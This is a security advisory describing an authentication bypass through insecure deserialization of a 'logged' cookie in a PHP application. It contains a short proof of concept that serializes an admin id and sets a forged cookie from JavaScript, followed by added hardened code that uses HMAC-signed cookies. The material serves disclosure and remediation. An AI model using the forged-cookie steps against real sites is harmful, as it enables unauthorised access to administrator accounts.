### Key Information

#### Vulnerability Type

- **Authentication Bypass via Insecure Deserialization (Critical)**

#### Vulnerability Description

- The `loadLanguage` function in `class.main.php` calls `unserialize()` on data taken from the client-controlled `logged` cookie. Whatever value the cookie carries is deserialized and assigned to `$user_id`, which is then treated as the identity of a logged-in user: the mere presence of a `logged` cookie is enough to take the "logged in" branch, and the attacker chooses the deserialized value. Because `unserialize()` runs on attacker-supplied input, the same call is also the usual entry point for PHP object-injection gadget chains, although this advisory only documents the authentication impact.

#### Code Snippet

```php
private function loadLanguage() {
    $lang_abbr = $this->getPreferredLanguage();
    $abbr = $default_lang_abbr = 'en';
    if (isset($_SESSION['logged']) || isset($_COOKIE['logged'])) {
        // insecure deserialization: the cookie is client-controlled
        $user_id = $_SESSION['logged']['id'] ? $_SESSION['logged']['id'] : unserialize($_COOKIE['logged']['id']);
        $lang_abbr = $this->getUserLanguage($user_id);
    }
    if (isset($lang_abbr) && $lang_abbr !== null) {
        $abbr = $lang_abbr;
        $this->user_lang = $lang_abbr;
    }
}
```

Note that the snippet indexes `$_COOKIE['logged']['id']` before calling `unserialize()`, while the proof of concept below sets the whole `logged` cookie. PHP only populates `$_COOKIE['logged']['id']` from a cookie named `logged[id]`, so check which form the deployed code actually reads before testing.

#### Exploitation Method

1. **Create a Malicious Serialized Array**

```php
<?php
// Build the array the vulnerable code expects and serialize it.
$arr = array(
    'id'       => 1,
    'username' => 'admin',
);
$serialized = serialize($arr);
echo "[*] Printing result: \n$serialized\n";
// Confirm that deserializing it yields the chosen user id.
$unserialized = unserialize($serialized)['id'];
echo "[*] Confirming id value: $unserialized\n";
```

2. **Set New Cookie Value**

```javascript
// The raw cookie value
const cookieValue = 'a:2:{s:2:"id";i:1;s:8:"username";s:5:"admin";}';

// URL encode the value to safely set in cookie
const encodedValue = encodeURIComponent(cookieValue);

// Set the cookie (session cookie, path=/); a template literal is needed so the
// encoded value is actually interpolated
document.cookie = `logged=${encodedValue}; path=/`;

// Verify the cookie
console.log(document.cookie);
```

#### Impact

- By exploiting this vulnerability, an attacker can bypass the authentication mechanism and authenticate as an administrator.
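The following is an added example, not code from the original advisory or from the affected project. It shows how the cookie-trusting branch can be hardened: the server-side session is the only source of identity, and if a cookie must carry a user id it is JSON-encoded and HMAC-signed, so `unserialize()` is never called on client data. `getUserLanguageStub`, the `COOKIE_KEY` constant and the stand-alone `loadLanguageHardened` function (superglobals passed in as arrays) are assumptions made so the code runs from the CLI.

```php
<?php
// Added example, not from the advisory or the project. Hypothetical secret;
// in production load it from configuration, never hard-code it.
const COOKIE_KEY = 'replace-with-a-random-32-byte-secret';

// Hypothetical stand-in for the project's getUserLanguage() database lookup.
function getUserLanguageStub(int $userId): ?string {
    $langs = [1 => 'en', 2 => 'de'];
    return $langs[$userId] ?? null;
}

// Build a "remember me" cookie: base64(JSON payload) . hex HMAC-SHA256.
function makeRememberCookie(int $userId, string $key): string {
    $payload = base64_encode(json_encode(['id' => $userId, 'exp' => time() + 86400 * 30]));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

// Parse and verify the cookie. Returns the user id only if the signature is
// valid, the payload is well-formed JSON, the id is a positive integer and the
// cookie has not expired; otherwise null. No unserialize() anywhere.
function readRememberCookie(?string $cookie, string $key): ?int {
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return null;
    }
    [$payload, $sig] = explode('.', $cookie, 2);
    // Constant-time comparison against the server-computed MAC.
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $sig)) {
        return null;
    }
    $raw = base64_decode($payload, true);
    $data = is_string($raw) ? json_decode($raw, true) : null;
    if (!is_array($data) || !isset($data['id'], $data['exp'])) {
        return null;
    }
    if (!is_int($data['id']) || $data['id'] <= 0 || !is_int($data['exp']) || $data['exp'] < time()) {
        return null;
    }
    return $data['id'];
}

// Hardened replacement for the loadLanguage() branch shown in the advisory.
function loadLanguageHardened(array $session, array $cookie, string $key): string {
    $abbr = 'en';
    $userId = null;

    if (isset($session['logged']['id'])) {
        // Session data is server-side, but still validate its shape.
        $userId = filter_var($session['logged']['id'], FILTER_VALIDATE_INT);
        if ($userId === false || $userId <= 0) {
            $userId = null;
        }
    } elseif (isset($cookie['logged']) && is_string($cookie['logged'])) {
        $userId = readRememberCookie($cookie['logged'], $key);
    }

    if ($userId !== null) {
        $abbr = getUserLanguageStub($userId) ?? $abbr;
    }
    return $abbr;
}

// Demo with constructed inputs: the forged cookie from the advisory, a signed
// cookie for user 2, and a genuine session for user 1.
$forged  = ['logged' => 'a:2:{s:2:"id";i:1;s:8:"username";s:5:"admin";}'];
$signed  = ['logged' => makeRememberCookie(2, COOKIE_KEY)];
$session = ['logged' => ['id' => 1]];

echo "forged cookie  -> ", loadLanguageHardened([], $forged, COOKIE_KEY), "\n";
echo "signed cookie  -> ", loadLanguageHardened([], $signed, COOKIE_KEY), "\n";
echo "server session -> ", loadLanguageHardened($session, $forged, COOKIE_KEY), "\n";
```

Run it with `php hardened.php`. The forged serialized cookie is ignored and the function falls back to the default language, the HMAC-signed cookie resolves to user 2's language, and when a server-side session exists the cookie is not consulted at all. Tampering with any byte of the signed payload, or signing it with a different key, makes `readRememberCookie` return null.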